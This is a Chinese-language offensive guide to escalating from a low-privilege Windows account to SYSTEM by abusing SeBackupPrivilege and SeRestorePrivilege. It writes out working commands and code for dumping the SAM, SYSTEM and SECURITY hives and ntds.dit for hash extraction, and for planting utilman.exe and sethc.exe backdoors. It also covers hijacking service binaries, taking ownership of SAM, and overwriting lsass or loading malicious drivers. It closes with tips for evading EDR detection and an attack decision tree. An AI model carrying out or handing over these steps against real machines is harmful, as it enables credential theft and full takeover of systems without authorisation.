在 Windows 权限提升与横向移动的实战中，SeBackupPrivilege和SeRestorePrivilege这两个特权几乎可以称得上是“核武器级”存在。只要一个普通用户（甚至低权限账户）被加入Backup Operators组，或者被显式授予其中任意一个特权，就很可能实现从普通用户 → SYSTEM 的权限跃迁，甚至直接接管整台机器。

但非常重要的一点是：这两个特权的能力其实并不完全相同，它们在读取和写入上的表现有本质区别，实战中经常出现“以为自己有权限其实只能读不能写”或者“写的时候报错但读没问题”的情况。

一、两个特权的本质与内核机制区别

一句话总结区别：

• SeBackupPrivilege≈ 只开了“只读备份通道” → 你可以把几乎任何文件的内容读出来，但不能修改、覆盖、创建新文件到高保护位置
• SeRestorePrivilege≈ 开了“写入还原通道” → 你可以把内容写到几乎任何位置，甚至覆盖系统文件、修改所有权、ACL
• 两者同时拥有≈ 完整备份还原能力 → 读写通吃，几乎无视所有 NTFS 保护（除了极少数内核硬保护）

二、利用手法整理

（一）只拥有 SeBackupPrivilege 的利用方式（纯读能力）

1. reg save 导出注册表蜂窝（至今最经典、最稳定）

   reg save HKLM\SAM sam.hive reg save HKLM\SYSTEM system.hive reg save HKLM\SECURITY security.hive

   → 导出后用 secretsdump / impacket / samdump2 提取本地 hash

2. 读取 ntds.dit（域控环境）

   • diskshadow 创建持久化影子拷贝
   • robocopy /B 拷贝 ntds.dit + SYSTEM hive
   • impacket-secretsdump 提取域 hash（DCSync 等价）

3. 使用 SeBackupPrivilegeUtils 模块读取任意文件（PowerShell 最方便）

   Import-Module.\SeBackupPrivilegeUtils.dllImport-Module.\SeBackupPrivilegeCmdLets.dllSet-SeBackupPrivilegeCopy-FileSeBackupPrivilege"C:\Windows\system32\config\SAM""c:\temp\sam.bak"

4. 自写程序 + FILE_FLAG_BACKUP_SEMANTICS 读取
   最常用 C# 写法（2025年后 Rust/Go 也流行）：

   constuintBACKUP_SEMANTICS=0x02000000;usingvarfs=newFileStream(@"C:\Windows\system32\config\SAM",FileMode.Open,FileAccess.Read,FileShare.ReadWrite,4096,(FileOptions)BACKUP_SEMANTICS);

5. wbadmin + vssadmin 老派玩法（新系统基本失效，但某些老域控仍可）

   wbadmin start backup -backupTarget:E: -include:C: -allCritical -quiet

（二）只拥有 SeRestorePrivilege 的利用方式（重点：可写）

1. 最经典提权手法

   copy /Y c:\windows\system32\cmd.exe c:\windows\system32\utilman.exe

   重启 → 锁屏界面 Win+U → 弹出 SYSTEM 权限 cmd

2. 替换 sethc.exe（粘滞键后门）

   copy /Y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

   锁屏连续按 Shift 5次 → SYSTEM cmd

3. 覆盖常见服务可执行文件（需服务可停止）

   • AppReadiness
   • spoolsrv
   • Appinfo
   • TrustedInstaller（较难）

   sc config AppReadiness binPath= "C:\temp\malicious.exe" sc stop AppReadiness sc start AppReadiness

4. 直接写入高保护目录（配合 SeRestore）

   echo malicious > "C:\Windows\System32\config\SAM"

   （极度危险，极易蓝屏）

5. 修改文件所有权 & ACL（最彻底玩法）

   takeown /F "C:\Windows\System32\config\SAM" /A icacls "C:\Windows\System32\config\SAM" /grant Administrators:F

（三）两者都拥有时的最强组合玩法

• 读 + 写 = 任意文件任意位置任意操作
• 最危险组合：直接修改 SAM、SYSTEM、ntds.dit、驱动文件、组策略文件等
• 常见核弹级玩法（慎用，会搞崩系统）：
  1. 直接覆盖 SAM 文件 → 改本地管理员密码
  2. 写恶意驱动到 drivers 目录 + 加载（需绕过驱动签名强制）
  3. 修改 BCD/BOOTMGR → 持久化后门
  4. 覆盖 lsass.exe → 注入恶意 lsass（极高检测）

三、2026年新变化与限制

1. Windows 11 24H2 / Server 2025 强化了以下保护：

   • TrustedInstaller 保护的很多文件即使有 SeRestore 也不一定能覆盖（内核新增硬性校验）
   • utilman.exe / sethc.exe 被越来越多环境加了文件完整性校验（尤其企业环境）
   • lsass.exe 保护等级提升（Credential Guard 更普及）

2. Defender & EDR 检测逻辑升级（2025年后明显加强）

   • reg save SAM/SYSTEM → 高危行为（几乎必报）
   • robocopy /B 或 /ZB → 被大部分商用 EDR 标记为可疑
   • 频繁使用 FILE_FLAG_BACKUP_SEMANTICS 的进程 → 被重点监控
   • CreateFile + SeBackupPrivilege 调用链 → 很多 EDR 能抓到

3. 目前仍然相对隐蔽的绕过思路（2026 年初）：

   • 不直接用 robocopy，用自己写的 C#/Rust 程序调用 BackupRead/BackupWrite API
   • 用 Volume Shadow Copy Service (VSS) 间接读取，不直接碰特权标志
   • 用合法备份软件（Veeam、Acronis 等）进行二次利用
   • 先把文件读到内存，再通过其他通道写出（内存马、反射加载等）

四、实战决策树（建议优先级）

whoami /priv 看到 Backup/Restore 特权了吗？ ↓ 是 是否在域控？ ↓ 是 ──> diskshadow + robocopy ntds.dit → 优先 ↓ 否 是否有 SeRestorePrivilege？ ↓ 是 ──> 优先尝试 utilman.exe / sethc.exe 替换（最快） ↓ 否 只剩 SeBackupPrivilege ↓ 优先 reg save SAM/SYSTEM → 提取 hash ↓ 次选 SeBackupPrivilegeUtils 模块读取敏感文件 ↓ 最后考虑自写程序读取

五、总结

在 2026 年的 Windows 环境下，SeBackupPrivilege + SeRestorePrivilege仍然是权限提升里最直接、最暴力的组合之一。

• 只有 SeBackup → 基本等于“能 dump hash 就赢一半”
• 只有 SeRestore → 经典 utilman/sethc 替换仍然是最高效提权路径
• 两者都有 → 几乎无解，除非系统开了 Credential Guard + 内核完整性保护 + 强 EDR